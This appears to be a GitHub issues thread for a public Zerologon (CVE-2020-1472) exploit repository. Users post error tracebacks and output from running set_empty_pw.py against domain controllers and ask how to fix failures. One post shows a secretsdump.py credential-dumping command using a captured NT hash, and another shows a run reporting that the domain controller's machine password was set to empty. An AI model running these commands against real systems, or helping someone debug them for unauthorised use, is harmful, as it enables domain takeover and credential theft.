risksense / zerologon
Exploit for zerologon cve-2020-1472
License: MIT License
Traceback (most recent call last):
File "/root/zerologon/set_empty_pw.py", line 147, in
perform_attack('\\' + dc_name, dc_ip, dc_name)
File "/root/zerologon/set_empty_pw.py", line 123, in perform_attack
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/zerologon/set_empty_pw.py", line 28, in try_zero_authenticate
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/epm.py", line 1328, in hept_map
resp = dce.request(request)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x16c9a0d6 - ept_s_not_registered
Does anyone have any idea how to fix this issue?
sudo secretsdump.py -hashes :a656220101bf64f4768fecce5a4eb5fb 'REPUBLIC/[email protected]'
Impacket v0.9.23.dev1+20210518.120245.2e3cd7cd - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...
I'm testing on a client, but the server is on IPv6, and the script is not working. Would there be another way to use this exploit?
Solved
What is the ORIG_NT_HASH, administrator NM hash, or $MACHINE.ACC:plain_password_hex?
Why does reinstall_original_pw use the same attack to log on? At this point the target's account password should be empty, so can't we use the hash of an empty password to authenticate?
Hi,
when I used the Python script I received this error:
Performing authentication attempts...
Unexpected error: [Errno 104] Connection reset by peer.
This might have been caused by invalid arguments or network issues.
Please help me.
set_empty_pw hits an error and is not successful; see the error below.
Other PoCs worked OK.
root@kali:~/Desktop/zerologon-master# python3 set_empty_pw.py DCNAME 10.102.9.46
Performing authentication attempts...
==============================================================================================================================================
NetrServerAuthenticate3Response
ServerCredential:
Data: b'\x0c\x818\x9e\x86\xe34\xc7'
NegotiateFlags: 556793855
AccountRid: 1008
ErrorCode: 0
server challenge b'\x0c\x08\xa9\x05\xb8SD>'
'bytes' object does not support item assignment
Success! DC should now have the empty string as its machine password.
Performing authentication attempts...
Traceback (most recent call last):
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/transport.py", line 346, in connect
self.__socket.connect(sa)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "cve-2020-1472-exploit.py", line 126, in
main()
File "cve-2020-1472-exploit.py", line 123, in main
perform_attack('\\' + dc_name, dc_ip, victim)
File "cve-2020-1472-exploit.py", line 70, in perform_attack
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/epm.py", line 1256, in hept_map
dce.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/transport.py", line 349, in connect
raise DCERPCException("Could not connect: %s" % msg)
impacket.dcerpc.v5.rpcrt.DCERPCException: Could not connect: timed out
Hi!
The error in the title shows up every time I run the "set_empty_pw.py" script, but right after the 'error' your script says: "success! dc should now have the empty string as its machine password". But by the way, it doesn't!
I've reinstalled impacket with
"pip3 install impacket"
and downloaded the impacket repo from source:
"python3.6 setup.py install"
"python3.6 setup.py build"
"sudo apt install python-impacket"
I've tried to change all the "#!/usr/bin/env " to "!/usr/bin/python3.6"
and the script keeps complaining about that "has no attribute". I wrote a python3.6 script using NetrServerPasswordSet2 and then it doesn't get an error.